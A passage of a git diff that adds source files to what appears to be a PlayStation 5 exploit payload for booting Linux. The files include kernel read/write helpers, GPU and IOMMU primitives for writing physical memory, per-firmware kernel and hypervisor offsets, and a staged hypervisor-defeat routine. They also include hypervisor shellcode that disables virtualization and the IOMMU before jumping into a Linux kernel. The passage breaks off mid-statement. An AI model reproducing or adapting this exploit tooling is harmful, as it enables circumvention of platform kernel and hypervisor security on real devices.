PAGE_SIZE +// #define kernel_cave_initrd // Allocated dynamically after bzImage + +// Linux boot config +#define VRAM_SIZE (512ULL * 1024 * 1024) +#define CMD_LINE \ + "root=/dev/sda2 rw rootwait console=ttyTitania0 console=tty0 " \ + "video=DP-1:1920x1080@60 mitigations=off idle=halt pci=pcie_bus_perf" + +#define DEBUG 0 // Toggle to 0 to disable logs + +#endif \ No newline at end of file diff --git a/include/gpu.h b/include/gpu.h new file mode 100644 index 0000000..127c6b7 --- /dev/null +++ b/include/gpu.h @@ -0,0 +1,70 @@ +/*** Source: ps5-hen by cragson ***/ + +#ifndef GPU_H +#define GPU_H + +#include + +#define GPU_PDE_VALID_BIT 0 +#define GPU_PDE_IS_PTE_BIT 54 +#define GPU_PDE_TF_BIT 56 +#define GPU_PDE_BLOCK_FRAG_BIT 59 +#define GPU_PDE_ADDR_MASK 0x0000FFFFFFFFFFC0ULL + +#define PROT_GPU_READ 0x10 +#define PROT_GPU_WRITE 0x20 +#define MAP_NO_COALESCE 0x00400000 + +#define GPU_SUBMIT_IOCTL 0xC0108102 + +#define PM4_TYPE3 3 +#define PM4_SHADER_COMPUTE 1 +#define PM4_OPCODE_DMA_DATA 0x50 +#define PM4_OPCODE_INDIRECT_BUF 0x3F + +struct gpu_kernel_offsets { + uint64_t proc_vmspace; // proc->p_vmspace offset + uint64_t vmspace_vm_vmid; // vmspace->vm_vmid offset + uint64_t data_base_gvmspace; // offset from kernel data base to gvmspace array + uint64_t sizeof_gvmspace; // size of each gvmspace entry + uint64_t gvmspace_page_dir_va; // gvmspace->page_dir_va offset (GPU PDB2) + uint64_t gvmspace_size; // gvmspace->size offset + uint64_t gvmspace_start_va; // gvmspace->start_va offset +}; + +struct gpu_ctx { + int fd; // /dev/gc file descriptor + int initialized; // 1 if gpu_init() succeeded + + uint64_t victim_va; // CPU VA of victim buffer (GPU PTE remapped) + uint64_t transfer_va; // CPU VA of transfer/staging buffer + uint64_t cmd_va; // CPU VA of PM4 command buffer + + uint64_t victim_real_pa; // original physical address of victim buffer + uint64_t victim_ptbe_va; // kernel VA of the GPU PTE for victim buffer + uint64_t cleared_ptbe; // GPU PTE with physical address cleared (template) + uint64_t page_size; // GPU page size for victim allocation (should be 2MB) + uint64_t dmem_size; // allocation size (2MB) +}; + +void gpu_set_offsets(struct gpu_kernel_offsets *offsets); + +int gpu_init(void); +int gpu_init_internal(void); + +int gpu_test(void); + +int gpu_read_phys(uint64_t phys_addr, void *out_buf, uint32_t size); +uint8_t gpu_read_phys1(uint64_t phys_addr); +uint32_t gpu_read_phys4(uint64_t phys_addr); +uint64_t gpu_read_phys8(uint64_t phys_addr); + +int gpu_write_phys(uint64_t phys_addr, const void *in_buf, uint32_t size); +void gpu_write_phys4(uint64_t phys_addr, uint32_t value); +void gpu_write_phys8(uint64_t phys_addr, uint64_t value); + +void gpu_cleanup(void); + +struct gpu_ctx *gpu_get_ctx(void); + +#endif \ No newline at end of file diff --git a/include/hv_defeat.h b/include/hv_defeat.h new file mode 100644 index 0000000..0d11ef3 --- /dev/null +++ b/include/hv_defeat.h @@ -0,0 +1,19 @@ +#ifndef HV_DEFEAT_H +#define HV_DEFEAT_H + +#include "iommu.h" +#include + +int hv_defeat(void); +int stage1_tmr_relax(void); +int stage2_find_vmcbs(void); +uint64_t get_vmcb(int core); +int iommu_selftest(void); +int stage3_patch_vmcbs(void); +int stage4_force_vmcb_reload(void); +int stage5_remove_xotext(void); +int stage6_kernel_pmap_invalidate_all(void); +int stage7_install_kexec(void); +int kexec(uint64_t fptr); + +#endif \ No newline at end of file diff --git a/include/iommu.h b/include/iommu.h new file mode 100644 index 0000000..47a940c --- /dev/null +++ b/include/iommu.h @@ -0,0 +1,46 @@ +/*** Source: ps5-hen by cragson ***/ + +#ifndef IOMMU_H +#define IOMMU_H + +#include + +// Command buffer MMIO offsets +#define IOMMU_MMIO_CB_HEAD 0xa000 +#define IOMMU_MMIO_CB_TAIL 0xa008 + +// Queue constants +#define IOMMU_CB_SIZE 0x2000 +#define IOMMU_CB_MASK (IOMMU_CB_SIZE - 1) +#define IOMMU_CMD_ENTRY_SIZE 0x10 + +// IOMMU softc field offsets +#define IOMMU_SC_MMIO_VA 0x40 +#define IOMMU_SC_CB2_PTR 0x78 +#define IOMMU_SC_CB3_PTR 0x80 +#define IOMMU_SC_EB_PTR 0x60b90 + +typedef struct _iommu_ctx { + uint64_t cb2_base; // kernel VA of command buffer 2 (hv terminology) + uint64_t cb3_base; // kernel VA of command buffer 3 (hv terminology) + uint64_t eb_base; // kernel VA of event buffer + uint64_t mmio_va; // DMAP VA of IOMMU MMIO base +} iommu_ctx; + +extern iommu_ctx iommu_store; +extern iommu_ctx *iommu; + +int iommu_init(void); + +// Submit a single 16-byte command and wait for completion +void iommu_submit_cmd(const void *cmd); +// Write 8 bytes to a physical address using IOMMU completion wait store +void iommu_write8_pa(uint64_t pa, uint64_t val); + +// Write 4 bytes to a physical address +void iommu_write4_pa(uint64_t pa, uint32_t val); + +// Write arbitrary length to a physical address in 8-byte chunks +void iommu_write_pa(uint64_t pa, const void *data, uint32_t len); + +#endif \ No newline at end of file diff --git a/include/loader.h b/include/loader.h new file mode 100644 index 0000000..b8b91e8 --- /dev/null +++ b/include/loader.h @@ -0,0 +1,11 @@ +#include "utils.h" +#include + +static uint64_t alloc_page(void); +static void install_page(uintptr_t pml4, vm_offset_t va, vm_paddr_t pa, + int bits); +void pte_store(uintptr_t ptep, uint64_t pte); +static int read_file(const char *path, void *buf, size_t bufsize); +static void trim_newline(char *s); +static size_t fetch_file(int port, void *buf, size_t bufsize); +int fetch_linux(struct linux_info *info); diff --git a/include/main.h b/include/main.h new file mode 100644 index 0000000..5a78268 --- /dev/null +++ b/include/main.h @@ -0,0 +1,8 @@ +#ifndef MAIN_H +#define MAIN_H + +int main(void); +int setup_env(void); +int prepare_resume(void); + +#endif \ No newline at end of file diff --git a/include/offsets.h b/include/offsets.h new file mode 100644 index 0000000..c1a91df --- /dev/null +++ b/include/offsets.h @@ -0,0 +1,51 @@ +#ifndef OFFSETS_H +#define OFFSETS_H + +#include + +typedef struct _offset_list { + uint64_t PMAP_STORE; + uint64_t HV_BSS_OFF; // Needed for 1.xx and 2.xx + uint64_t HV_VCPU; // Needed for 1.xx and 2.xx + uint64_t HV_VCPU_CPUID; // Needed for 1.xx and 2.xx + uint64_t HV_VCPU_ARRAY_OFF; // Needed for 1.xx and 2.xx + uint64_t HV_VCPU_STRIDE; // Needed for 1.xx and 2.xx + uint64_t HV_VCPU_VMCB_PTR; // Needed for 1.xx and 2.xx + uint64_t KERNEL_CODE_CAVE; + uint64_t KERNEL_DATA_CAVE; + uint64_t IOMMU_SOFTC; + uint64_t VMSPACE_VM_VMID; + uint64_t VMSPACE_VM_PMAP; + uint64_t PMAP_PM_PML4; + uint64_t PMAP_PM_CR3; + uint64_t DATA_BASE_GVMSPACE; + uint64_t HOOK_ACPI_WAKEUP_MACHDEP; + uint64_t FUN_PRINTF; + uint64_t FUN_VA_TO_PA; + uint64_t FUN_HV_IOMMU_SET_BUFFERS; + uint64_t FUN_HV_IOMM_WAIT_COMPLETION; + uint64_t FUN_SMP_RENDEZVOUS; + uint64_t FUN_SMP_NO_RENDEVOUS_BARRIER; + uint64_t HV_HANDLE_VMEXIT_PA; + uint64_t HV_CODE_CAVE_PA; + uint64_t HV_UART_OVERRIDE_PA; + uint64_t G_VBIOS; + uint64_t FUN_TRANSMITTER_CONTROL; + uint64_t FUN_MP3_INITIALIZE; + uint64_t FUN_MP3_INVOKE; + uint64_t KERNEL_UART_OVERRIDE; + uint64_t KERNEL_DEBUG_PATCH; + uint64_t KERNEL_CFI_CHECK; +} offset_list; + +extern offset_list off_0300; +extern offset_list off_0310; +extern offset_list off_0320; +extern offset_list off_0321; +extern offset_list off_0400; +extern offset_list off_0402; +extern offset_list off_0403; +extern offset_list off_0450; +extern offset_list off_0451; + +#endif \ No newline at end of file diff --git a/include/tmr.h b/include/tmr.h new file mode 100644 index 0000000..55f9214 --- /dev/null +++ b/include/tmr.h @@ -0,0 +1,19 @@ +#ifndef TMR_H +#define TMR_H + +#include + +#define ECAM_B0D18F2 dmap + (0xF0000000ULL + 0x18ULL * 0x8000 + 2 * 0x1000) +#define TMR_INDEX_OFF 0x80 +#define TMR_DATA_OFF 0x84 + +#define TMR_BASE(n) ((n) * 0x10 + 0x00) +#define TMR_LIMIT(n) ((n) * 0x10 + 0x04) +#define TMR_CONFIG(n) ((n) * 0x10 + 0x08) +#define TMR_REQUESTORS(n) ((n) * 0x10 + 0x0C) +#define TMR_CFG_PERMISSIVE 0x3F07 + +uint32_t tmr_read(uint32_t addr); +void tmr_write(uint32_t addr, uint32_t val); + +#endif \ No newline at end of file diff --git a/include/utils.h b/include/utils.h new file mode 100644 index 0000000..ee3855a --- /dev/null +++ b/include/utils.h @@ -0,0 +1,162 @@ +#ifndef UTILS_H +#define UTILS_H + +#include "offsets.h" +#include +#include +#include +#include + +int sceKernelGetCurrentCpu(); +int sceKernelSendNotificationRequest(int, void *, size_t, int); + +typedef struct _sysent { + uint32_t n_arg; + uint32_t pad; + uint64_t sy_call; + uint64_t sy_auevent; + uint64_t sy_systrace_args; + uint32_t sy_entry; + uint32_t sy_return; + uint32_t sy_flags; + uint32_t sy_thrcnt; +} sysent; + +typedef struct __flat_pmap { + uint64_t mtx_name_ptr; + uint64_t mtx_flags; + uint64_t mtx_data; + uint64_t mtx_lock; + uint64_t pm_pml4; + uint64_t pm_cr3; +} flat_pmap; + +struct linux_info { + uintptr_t bzimage; + size_t bzimage_size; + uintptr_t initrd; + size_t initrd_size; + size_t vram_size; + char cmdline[2048]; + uintptr_t linux_info; // PA of linux_info +}; + +/** These vars are global for the payload to simplify things */ +extern offset_list env_offset; // Defined on utils.c +extern uint64_t ktext; // Defined on utils.c +extern uint64_t kdata; // Defined on utils.c +extern uint64_t dmap; // Defined on utils.c +extern uint64_t cr3; // Defined on utils.c +extern uint32_t fw; // Defined on utils.c +extern uint64_t vmcb_pa[16]; // Defined on hv_defeat.c +extern struct linux_info linux_i; // Declared on main.c + +static inline void kwrite(uint64_t ka, void *src, uint64_t len) { + kernel_copyin(src, ka, len); +} + +static inline void kwrite64(uint64_t dst, uint64_t val) { + kernel_copyin(&val, dst, 8); +} + +static inline void kwrite32(uint64_t dst, uint32_t val) { + kernel_copyin(&val, dst, 4); +} + +static inline void kwrite8(uint64_t dst, uint8_t val) { + kernel_copyin(&val, dst, 1); +} + +static inline void kread(uint64_t ka, void *dst, uint64_t len) { + kernel_copyout(ka, dst, len); +} + +static inline uint64_t kread64(uint64_t src) { + uint64_t val; + kernel_copyout(src, &val, 8); + return val; +} + +static inline uint32_t kread32(uint64_t src) { + uint32_t val; + kernel_copyout(src, &val, 4); + return val; +} + +static inline uint8_t kread8(uint64_t src) { + uint8_t val; + kernel_copyout(src, &val, 1); + return val; +} + +int set_offsets(void); +int init_global_vars(void); +uint64_t get_offset_va(uint64_t offset); + +// Defines for Page management +#define ALIGN_UP(size, align) (((size) + (align) - 1) & ~((align) - 1)) +#define INKERNEL(va) (va & 0xFFFF000000000000) + +enum page_bits { + P = 0, + RW, + US, + PWT, + PCD, + A, + D, + PS, + G, + XO = 58, + PK = 59, + NX = 63 +}; + +#define PG_B_P (1ULL << P) +#define PG_B_RW (1ULL << RW) +#define PAGE_P(x) (x & (1ULL << P)) +#define PAGE_RW(x) (x & (1ULL << RW)) +#define PAGE_PS(x) (x & (1ULL << PS)) +#define PAGE_XO(x) (x & (1ULL << XO)) +#define PAGE_CLEAR_XO(x) (x &= ~(1ULL << XO)) +#define PAGE_CLEAR_G(x) (x &= ~(1ULL << G)) +#define PAGE_SET_RW(x) (x |= (1ULL << RW)) +#define PAGE_PA(x) (x & 0x000FFFFFFFFFF000ULL) +#define P_SIZE(l) ((l == 1) ? (1ULL << 30) : (1ULL << 21)) + +#define pmap_pml4e_index(va) ((va >> 39) & 0x1FF) +#define pmap_pdpe_index(va) ((va >> 30) & 0x1FF) +#define pmap_pde_index(va) ((va >> 21) & 0x1FF) +#define pmap_pte_index(va) ((va >> 12) & 0x1FF) + +uint64_t va_to_pa_user(uint64_t va); +uint64_t va_to_pa_kernel(uint64_t va); +uint64_t va_to_pa_custom(uint64_t va, uint64_t cr3_custom); +uint64_t pa_to_dmap(uint64_t pa); +void page_chain_set_rw(uint64_t va); +uint64_t page_remove_global(uint64_t va); + +uint64_t getpmap(uint64_t proc_ptr); +uint64_t get_pml4(uint64_t pmap); + +int pin_to_core(int n); +int pin_to_first_available_core(void); +void unpin(void); +static inline void notify(uint8_t *msg) { + struct { + char pad[45]; + char msg[3075]; + } req; + uint64_t len = + strlen(msg) < (sizeof(req.msg) - 1) ? strlen(msg) : (sizeof(req.msg) - 1); + memcpy(req.msg, msg, len); + sceKernelSendNotificationRequest(0, &req, sizeof(req), 0); +} + +#if DEBUG +#define DEBUG_PRINT(fmt, ...) printf(fmt, ##__VA_ARGS__) +#else +#define DEBUG_PRINT(fmt, ...) +#endif + +#endif diff --git a/shellcode_hypervisor/Makefile b/shellcode_hypervisor/Makefile new file mode 100644 index 0000000..3d6fc1e --- /dev/null +++ b/shellcode_hypervisor/Makefile @@ -0,0 +1,32 @@ +ifndef PS5_PAYLOAD_SDK + PS5_PAYLOAD_SDK = /opt/ps5-payload-sdk/ +endif + +# 1. Variables +CC = gcc +LD = ld +CFLAGS = -O2 -fno-stack-protector -ffreestanding -nostdlib -fcf-protection=none -I$(PS5_PAYLOAD_SDK)/target/include +LDFLAGS = -T linker.ld +TARGET = shellcode_hypervisor.elf +TEXT_BIN = shellcode_hypervisor.bin +dump = shellcode_hypervisor.h + +SRC = main.c utils.c boot_linux.c +OBJ = $(SRC:.c=.o) + +all: $(dump) + +$(TARGET): $(OBJ) + $(CC) $(CFLAGS) $(LDFLAGS) $(OBJ) -o $(TARGET) + +%.o: %.c + $(CC) $(CFLAGS) -c $< -o $@ + +$(TEXT_BIN): $(TARGET) + objcopy -O binary -j .shell_code $(TARGET) $(TEXT_BIN) + +clean: + rm -f $(OBJ) $(TARGET) $(TEXT_BIN) $(dump) + +$(dump): $(TEXT_BIN) + python3 bin_to_c_hypervisor.py $(TEXT_BIN) \ No newline at end of file diff --git a/shellcode_hypervisor/bin_to_c_hypervisor.py b/shellcode_hypervisor/bin_to_c_hypervisor.py new file mode 100644 index 0000000..bb38d9c --- /dev/null +++ b/shellcode_hypervisor/bin_to_c_hypervisor.py @@ -0,0 +1,46 @@ +import sys +import os + +def create_shellcode_header(input_file): + if not os.path.exists(input_file): + print(f"Error: {input_file} not found.") + return + + # Read binary data_text + with open(input_file, "rb") as f: + data_text = f.read() + + # Hardcoded output name + output_name = "shellcode_hypervisor.h" + array_name = "shellcode_hypervisor" + + with open(output_name, "w") as f: + f.write(f"// Generated from {input_file}\n") + f.write(f"#ifndef SHELLCODE_HV_H\n") + f.write(f"#define SHELLCODE_HV_H\n\n") + f.write(f"#include \n\n") + + f.write(f"uint8_t {array_name}[] = {{\n ") + + for i, byte in enumerate(data_text): + f.write(f"0x{byte:02X}") + + if i < len(data_text) - 1: + f.write(", ") + + # New line every 12 bytes + if (i + 1) % 12 == 0: + f.write("\n ") + + f.write(f"\n}};\n\n") + f.write(f"uint64_t {array_name}_len = {len(data_text)};\n\n") + + f.write(f"#endif // SHELLCODE_HV_H\n") + + print(f"Done! Created {output_name} ({len(data_text)} bytes)") + +if __name__ == "__main__": + if len(sys.argv) < 2: + print("Usage: python bin_to_c_hypervisor.py ") + else: + create_shellcode_header(sys.argv[1]) \ No newline at end of file diff --git a/shellcode_hypervisor/boot_linux.c b/shellcode_hypervisor/boot_linux.c new file mode 100644 index 0000000..6e45dcf --- /dev/null +++ b/shellcode_hypervisor/boot_linux.c @@ -0,0 +1,173 @@ +#include "boot_linux.h" +#include "../include/config.h" +#include "linux.h" +#include "utils.h" +#include +#include + +struct linux_info { + uintptr_t bzimage; + size_t bzimage_size; + uintptr_t initrd; + size_t initrd_size; + size_t vram_size; + char cmdline[2048]; +}; + +static struct linux_info info; + +static volatile int exited_cpus = 0; + +static void configure_vram(uint64_t fb_start, uint64_t vram_start, + uint64_t vram_size) { + uint64_t vram_end = vram_start + vram_size - 1; + uint64_t fb_top = fb_start + vram_size - 1; + + *(uint32_t *)(AMDGPU_MMIO_BASE + RCC_CONFIG_MEMSIZE) = vram_size >> 20; + + *(uint32_t *)(AMDGPU_MMIO_BASE + GCMC_VM_FB_OFFSET) = vram_start >> 24; + + *(uint32_t *)(AMDGPU_MMIO_BASE + GCMC_VM_LOCAL_HBM_ADDRESS_START) = + vram_start >> 24; + *(uint32_t *)(AMDGPU_MMIO_BASE + GCMC_VM_LOCAL_HBM_ADDRESS_END) = + vram_end >> 24; + *(uint32_t *)(AMDGPU_MMIO_BASE + GCMC_VM_FB_LOCATION_BASE) = fb_start >> 24; + *(uint32_t *)(AMDGPU_MMIO_BASE + GCMC_VM_FB_LOCATION_TOP) = fb_top >> 24; + + *(uint32_t *)(AMDGPU_MMIO_BASE + MMMC_VM_FB_OFFSET) = vram_start >> 24; + *(uint32_t *)(AMDGPU_MMIO_BASE + MMMC_VM_LOCAL_HBM_ADDRESS_START) = + vram_start >> 24; + *(uint32_t *)(AMDGPU_MMIO_BASE + MMMC_VM_LOCAL_HBM_ADDRESS_END) = + vram_end >> 24; + *(uint32_t *)(AMDGPU_MMIO_BASE + MMMC_VM_FB_LOCATION_BASE) = fb_start >> 24; + *(uint32_t *)(AMDGPU_MMIO_BASE + MMMC_VM_FB_LOCATION_TOP) = fb_top >> 24; + + *(uint32_t *)(AMDGPU_MMIO_BASE + MMHUBBUB_WHITELIST_BASE_ADDR_0) = + vram_start >> 12; + *(uint32_t *)(AMDGPU_MMIO_BASE + MMHUBBUB_WHITELIST_TOP_ADDR_0) = + vram_end >> 12; + *(uint32_t *)(AMDGPU_MMIO_BASE + DCHUBBUB_WHITELIST_BASE_ADDR_0) = + vram_start >> 12; + *(uint32_t *)(AMDGPU_MMIO_BASE + DCHUBBUB_WHITELIST_TOP_ADDR_0) = + vram_end >> 12; +} + +static void append_e820_table(struct boot_params *bp, uint64_t start, + uint64_t end, uint32_t type) { + uint8_t idx = bp->e820_entries; + bp->e820_table[idx].addr = start; + bp->e820_table[idx].size = end - start; + bp->e820_table[idx].type = type; + bp->e820_entries++; +} + +static void e820_memory_setup(struct boot_params *bp) { + append_e820_table(bp, 0x000000000, 0x000001000, E820_TYPE_RESERVED); + append_e820_table(bp, 0x000001000, 0x000070000, E820_TYPE_RAM); + append_e820_table(bp, 0x000070000, 0x0000a0000, E820_TYPE_RESERVED); + append_e820_table(bp, 0x0000a0000, 0x0000c0000, E820_TYPE_RESERVED); + append_e820_table(bp, 0x0000c0000, 0x000100000, E820_TYPE_RESERVED); // VBIOS + append_e820_table(bp, 0x000100000, 0x03fffc000, E820_TYPE_RAM); + append_e820_table(bp, 0x03fffc000, 0x040000000, E820_TYPE_RESERVED); + append_e820_table(bp, 0x040000000, 0x060000000, E820_TYPE_RAM); + append_e820_table(bp, 0x060000000, 0x060800000, E820_TYPE_RESERVED); // MP4 + append_e820_table(bp, 0x060800000, 0x060c00000, E820_TYPE_RESERVED); // VCN FW + append_e820_table(bp, 0x060c00000, 0x062800000, E820_TYPE_RAM); + append_e820_table(bp, 0x062800000, 0x064800000, E820_TYPE_RESERVED); // HV + append_e820_table(bp, 0x064800000, 0x064829000, E820_TYPE_RESERVED); // MP3 + append_e820_table(bp, 0x064829000, 0x07f9d0000, E820_TYPE_RAM); + append_e820_table(bp, 0x07f9d0000, 0x07fd5f000, E820_TYPE_RESERVED); + append_e820_table(bp, 0x07fd5f000, 0x07fd63000, E820_TYPE_RESERVED); + append_e820_table(bp, 0x07fd63000, 0x07fd67000, E820_TYPE_RESERVED); + append_e820_table(bp, 0x07fd67000, 0x07fd6f000, E820_TYPE_NVS); + append_e820_table(bp, 0x07fd6f000, 0x07fd8f000, E820_TYPE_ACPI); + append_e820_table(bp, 0x07fd8f000, 0x07fd90000, E820_TYPE_RESERVED); + append_e820_table(bp, 0x07fd90000, 0x080000000, E820_TYPE_RESERVED); + append_e820_table(bp, 0x080000000, 0x0c4400000, E820_TYPE_RESERVED); + append_e820_table(bp, 0x0d0000000, 0x0e0700000, E820_TYPE_RESERVED); + append_e820_table(bp, 0x0f0000000, 0x0f8000000, E820_TYPE_RESERVED); + append_e820_table(bp, 0x100000000, VRAM_BASE, E820_TYPE_RAM); + append_e820_table(bp, VRAM_BASE, 0x470000000, E820_TYPE_RESERVED); // VRAM + append_e820_table(bp, 0x470000000, 0x47f300000, E820_TYPE_RAM); + append_e820_table(bp, 0x47f300000, 0x480000000, E820_TYPE_RESERVED); +} + +void boot_linux(void) { + uintptr_t kernel_pa = 0x100000; + uintptr_t setup_pa = 0x10000; + uintptr_t cmdline_pa = 0x20000; + + struct boot_params *bzimage_bp = (struct boot_params *)info.bzimage; + + struct boot_params *bp = (struct boot_params *)setup_pa; + struct setup_header *shdr = &bp->hdr; + + memset(bp, 0, sizeof(struct boot_params)); + + memcpy(shdr, &bzimage_bp->hdr, sizeof(struct setup_header)); + + e820_memory_setup(bp); + + shdr->hardware_subarch = X86_SUBARCH_PS5; + shdr->type_of_loader = 0xff; + shdr->cmd_line_ptr = cmdline_pa; + shdr->ramdisk_image = info.initrd & 0xffffffff; + shdr->ramdisk_size = info.initrd_size & 0xffffffff; + bp->ext_ramdisk_image = info.initrd >> 32; + bp->ext_ramdisk_size = info.initrd_size >> 32; + bp->acpi_rsdp_addr = ACPI_RSDP_ADDRESS; + + strcpy((char *)cmdline_pa, info.cmdline); + + size_t setup_size = (shdr->setup_sects + 1) * 512; + size_t kernel_size = shdr->syssize * 16; + + memcpy((void *)kernel_pa, (void *)(info.bzimage + setup_size), kernel_size); + + // printf("This is kernel_pa: "); print_val64(kernel_pa); printf("\n"); + void (*startup_64)(uint64_t physaddr, struct boot_params *bp) = + (void *)(kernel_pa + 0x200); + startup_64(kernel_pa, bp); +} + +void entry(void) { + + disable_intr(); + + // Set global interrupt flag. + __asm__ volatile("stgi\n"); + + // Clear SVM flag. + wrmsr(MSR_EFER, rdmsr(MSR_EFER) & ~EFER_SVM); + + // Disable INIT redirection. + wrmsr(MSR_VM_CR, rdmsr(MSR_VM_CR) & ~VM_CR_R_INIT); + + // Clean up mtrr. + wrmsr(MSR_MTRR4kBase + 0, 0); + + wrmsr(MSR_MTRR4kBase + 1, 0); + + wrmsr(MSR_MTRRVarBase + 7 * 2 + 1, 0); + + atomic_add_32(&exited_cpus, 1); + + while (atomic_cmpset_32(&exited_cpus, MAXCPU, MAXCPU) == 0) + ; + + if (get_cpu() != 0) { + while (1) { + halt(); + } + } + + // Disable IOMMU. + *(volatile uint64_t *)0xfdd80018 &= ~1; + + memcpy(&info, (void *)(cave_linux_info), sizeof(struct linux_info)); + + configure_vram(FB_BASE, VRAM_BASE, info.vram_size); + + printf("[*] Booting Linux in bare metal...\n"); + boot_linux(); +} diff --git a/shellcode_hypervisor/boot_linux.h b/shellcode_hypervisor/boot_linux.h new file mode 100644 index 0000000..8e4548f --- /dev/null +++ b/shellcode_hypervisor/boot_linux.h @@ -0,0 +1,43 @@ + +#define MSR_EFER 0xc0000080 +#define EFER_SVM (1ULL << 12) // Bit 12: Secure Virtual Machine Enable + +// // Virtual Machine Control Register (VM_CR) +#define MSR_VM_CR 0xc0010114 +#define VM_CR_R_INIT (1ULL << 1) // Bit 1: Intercept INIT + +// // MTRRs (Memory Type Range Registers) +#define MSR_MTRR4kBase 0x00000268 // MSR_MTRRfix4K_C0000 (primer registro 4k) +#define MSR_MTRRVarBase 0x00000200 // MTRR variable base (MSR_MTRRphysBase0) + +#define VRAM_BASE (0x470000000 - info.vram_size) + +#define FB_BASE 0xf400000000 + +#define ACPI_RSDP_ADDRESS 0x7fd8e014 + +#define AMDGPU_MMIO_BASE 0xe0600000 + +#define RCC_CONFIG_MEMSIZE 0x378c + +#define GCMC_VM_FB_OFFSET 0xa5ac +#define GCMC_VM_LOCAL_HBM_ADDRESS_START 0xa5d4 +#define GCMC_VM_LOCAL_HBM_ADDRESS_END 0xa5d8 +#define GCMC_VM_FB_LOCATION_BASE 0xa600 +#define GCMC_VM_FB_LOCATION_TOP 0xa604 + +#define MMMC_VM_FB_OFFSET 0x6a15c +#define MMMC_VM_LOCAL_HBM_ADDRESS_START 0x6a184 +#define MMMC_VM_LOCAL_HBM_ADDRESS_END 0x6a188 +#define MMMC_VM_FB_LOCATION_BASE 0x6a1b0 +#define MMMC_VM_FB_LOCATION_TOP 0x6a1b4 + +#define MMHUBBUB_WHITELIST_BASE_ADDR_0 0x24850 +#define MMHUBBUB_WHITELIST_TOP_ADDR_0 0x24854 +#define DCHUBBUB_WHITELIST_BASE_ADDR_0 0x24878 +#define DCHUBBUB_WHITELIST_TOP_ADDR_0 0x2487c + +#define MAXCPU 16 + +void entry(void); +void boot_linux(void); \ No newline at end of file diff --git a/shellcode_hypervisor/linker.ld b/shellcode_hypervisor/linker.ld new file mode 100644 index 0000000..c24a121 --- /dev/null +++ b/shellcode_hypervisor/linker.ld @@ -0,0 +1,18 @@ +/* linker.ld */ +ENTRY(main) + +SECTIONS +{ + . = 0x1000; /* 0x1000 to avoid warnings from linker */ + /* Place our custom header first */ + .shell_code : + { + *(.entry_point) + *(.text) + *(.text.*) + *(.data*) + *(.rodata*) + *(.bss) + *(.bss.*) + } +} \ No newline at end of file diff --git a/shellcode_hypervisor/linux.h b/shellcode_hypervisor/linux.h new file mode 100644 index 0000000..5d8d3c1 --- /dev/null +++ b/shellcode_hypervisor/linux.h @@ -0,0 +1,114 @@ +/* + * Copyright (C) 2026 Andy Nguyen + * + * This software may be modified and distributed under the terms + * of the MIT license. See the LICENSE file for details. + */ + +#ifndef __LINUX_H__ +#define __LINUX_H__ + +#include + +#define X86_SUBARCH_PS5 5 + +enum e820_type { + E820_TYPE_RAM = 1, + E820_TYPE_RESERVED = 2, + E820_TYPE_ACPI = 3, + E820_TYPE_NVS = 4, + E820_TYPE_UNUSABLE = 5, + E820_TYPE_PMEM = 7, + E820_TYPE_PRAM = 12, + E820_TYPE_SOFT_RESERVED = 0xefffffff, +}; + +struct boot_e820_entry { + uint64_t addr; + uint64_t size; + uint32_t type; +} __attribute__((packed)); + +struct setup_header { + uint8_t setup_sects; + uint16_t root_flags; + uint32_t syssize; + uint16_t ram_size; + uint16_t vid_mode; + uint16_t root_dev; + uint16_t boot_flag; + uint16_t jump; + uint32_t header; + uint16_t version; + uint32_t realmode_swtch; + uint16_t start_sys_seg; + uint16_t kernel_version; + uint8_t type_of_loader; + uint8_t loadflags; + uint16_t setup_move_size; + uint32_t code32_start; + uint32_t ramdisk_image; + uint32_t ramdisk_size; + uint32_t bootsect_kludge; + uint16_t heap_end_ptr; + uint8_t ext_loader_ver; + uint8_t ext_loader_type; + uint32_t cmd_line_ptr; + uint32_t initrd_addr_max; + uint32_t kernel_alignment; + uint8_t relocatable_kernel; + uint8_t min_alignment; + uint16_t xloadflags; + uint32_t cmdline_size; + uint32_t hardware_subarch; + uint64_t hardware_subarch_data; + uint32_t payload_offset; + uint32_t payload_length; + uint64_t setup_data; + uint64_t pref_address; + uint32_t init_size; + uint32_t handover_offset; + uint32_t kernel_info_offset; +} __attribute__((packed)); + +#define E820_MAX_ENTRIES_ZEROPAGE 128 + +struct boot_params { + uint8_t screen_info[0x40]; // 0x000 + uint8_t apm_bios_info[0x14]; // 0x040 + uint8_t _pad2[4]; // 0x054 + uint64_t tboot_addr; // 0x058 + uint8_t ist_info[0x10]; // 0x060 + uint64_t acpi_rsdp_addr; // 0x070 + uint8_t _pad3[8]; // 0x078 + uint8_t hd0_info[16]; // 0x080 + uint8_t hd1_info[16]; // 0x090 + uint8_t sys_desc_table[0x10]; // 0x0a0 + uint8_t olpc_ofw_header[0x10]; // 0x0b0 + uint32_t ext_ramdisk_image; // 0x0c0 + uint32_t ext_ramdisk_size; // 0x0c4 + uint32_t ext_cmd_line_ptr; // 0x0c8 + uint8_t _pad4[112]; // 0x0cc + uint32_t cc_blob_address; // 0x13c + uint8_t edid_info[0x80]; // 0x140 + uint8_t efi_info[0x20]; // 0x1c0 + uint32_t alt_mem_k; // 0x1e0 + uint32_t scratch; // 0x1e4 + uint8_t e820_entries; // 0x1e8 + uint8_t eddbuf_entries; // 0x1e9 + uint8_t edd_mbr_sig_buf_entries; // 0x1ea + uint8_t kbd_status; // 0x1eb + uint8_t secure_boot; // 0x1ec + uint8_t _pad5[2]; // 0x1ed + uint8_t sentinel; // 0x1ef + uint8_t _pad6[1]; // 0x1f0 + struct setup_header hdr; // 0x1f1 + uint8_t _pad7[0x290 - 0x1f1 - sizeof(struct setup_header)]; + uint32_t edd_mbr_sig_buffer[16]; // 0x290 + struct boot_e820_entry e820_table[E820_MAX_ENTRIES_ZEROPAGE]; // 0x2d0 + uint8_t _pad8[48]; // 0xcd0 + uint8_t eddbuf[0x1ec]; // 0xd00 + uint8_t _pad9[276]; // 0xeec +} __attribute__((packed)); + +#endif diff --git a/shellcode_hypervisor/main.c b/shellcode_hypervisor/main.c new file mode 100644 index 0000000..4028c1e --- /dev/null +++ b/shellcode_hypervisor/main.c @@ -0,0 +1,37 @@ +#include "main.h" +#include "../include/config.h" +#include "boot_linux.h" +#include "utils.h" +#include +#include +#include +#include +#include + +__attribute__((section(".entry_point"), naked)) uint32_t main(void) { + + // We enter this function after CR3 was updated to 1:1 mapping + // We need to point RSP/RBP to a good known valid address + uint32_t ebax, ebx, ecx, edx; + uint32_t cpu_id; + + __asm__ volatile("cpuid" + : "=a"(ebax), "=b"(ebx), "=c"(ecx), 